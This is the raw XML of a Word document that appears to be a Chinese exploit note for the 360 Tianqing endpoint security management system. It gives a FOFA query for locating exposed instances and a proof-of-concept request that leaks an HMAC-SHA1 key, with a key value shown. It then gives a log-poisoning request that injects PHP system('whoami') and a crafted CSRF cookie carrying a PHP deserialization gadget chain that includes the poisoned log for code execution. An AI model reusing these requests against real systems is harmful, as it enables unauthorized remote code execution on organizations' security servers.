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EF682" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fofa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44339DDC" w14:textId="46641460" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t>title="360新天擎" || body="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\":\"skylar6" || body="/task/index/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detail?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>={item.id}" || body="已过期或者未授权，购买请联系4008-136-360" || title="360天擎" || title="360天擎终端安全管理系统"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086E946D" w14:textId="77777777" w:rsidR="00233E5D" w:rsidRDefault="00233E5D" w:rsidP="007803B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0B3BE973" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1477A32B" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>获取hmac_sha1密钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBB598C" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4"/>
    <w:p w14:paraId="4A674127" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t>GET /runtime/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>state.bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763B4138" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t xml:space="preserve">Host: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A41E931" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9BF3B7" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52E17112" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t>8ea7d79a9f251c3befc01adaab3fc5dc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBBA538" w14:textId="0FA44136" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B6674C2" wp14:editId="71FF1FB9">
            <wp:extent cx="5274310" cy="2032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1B7B" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t>GET /%3Cscript+language=%22php%22%3Esystem%28%22whoami%22%</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>29;%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3C/script%3E HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2230F1C3" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t xml:space="preserve">Host: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB78288" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D177A30" w14:textId="7E62DEE2" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="320D8607" w14:textId="4BDB932F" w:rsidR="00C57D64" w:rsidRDefault="00C57D64" w:rsidP="007803B4"/>
    <w:p w14:paraId="41AA4758" w14:textId="3C7FC992" w:rsidR="00C57D64" w:rsidRDefault="00C57D64" w:rsidP="007803B4"/>
    <w:p w14:paraId="0D64AE46" w14:textId="77777777" w:rsidR="00C57D64" w:rsidRDefault="00C57D64" w:rsidP="007803B4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B77B07" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t>GET /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login?refer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=%2F HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F76B20" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t>Host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD56B37" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t xml:space="preserve">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157EE67E" w14:textId="77777777" w:rsidR="007803B4" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t>Cookie: YII_CSRF_TOKEN=f4a2f9c997317926f6563192a3b3646417050c16O%3A24%3A%22Smarty_Internal_Template%22%3A1%3A%7Bs%3A6%3A%22smarty%22%3BO%3A10%3A%22CWebModule%22%3A2%3A%7Bs%3A20%3A%22%00CModule%00_components%22%3Ba%3A0%3A%7B%7Ds%3A25%3A%22%00CModule%00_componentConfig%22%3Ba%3A1%3A%7Bs%3A13%3A%22cache_locking%22%3Ba%3A4%3A%7Bs%3A5%3A%22class%22%3Bs%3A11%3A%22CUrlManager%22%3Bs%3A12%3A</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>%22urlRuleClass%22%3Bs%3A14%3A%22CConfiguration%22%3Bs%3A5%3A%22rules%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A21%3A%22..%2Fwww%2Flogs%2Ferror.log%22%3B%7Ds%3A9%3A%22UrlFormat%22%3Bs%3A4%3A%22path%22%3B%7D%7D%7D%7D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3984222F" w14:textId="405D1B26" w:rsidR="007862CF" w:rsidRDefault="007803B4" w:rsidP="007803B4">
      <w:r>
        <w:t xml:space="preserve">Accept-Encoding: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:sectPr w:rsidR="00786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CD3EE" w14:textId="77777777" w:rsidR="00A25ADC" w:rsidRDefault="00A25ADC" w:rsidP="007803B4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="06BCFA89" w14:textId="77777777" w:rsidR="00A25ADC" w:rsidRDefault="00A25ADC" w:rsidP="00780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02C65" w14:textId="77777777" w:rsidR="00A25ADC" w:rsidRDefault="00A25ADC" w:rsidP="007803B4">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="57D22A0B" w14:textId="77777777" w:rsidR="00A25ADC" w:rsidRDefault="00A25ADC" w:rsidP="00780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70"/>
    <w:rsid w:val="001F7770"/>
    <w:rsid w:val="00233E5D"/>
    <w:rsid w:val="007803B4"/>
    <w:rsid w:val="007862CF"/>
    <w:rsid w:val="00A25ADC"/>
    <w:rsid w:val="00C5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6BB5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{151C9F57-6AC6-499F-862A-03FA30CB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3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3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2024-06-25T07:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-25T07:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>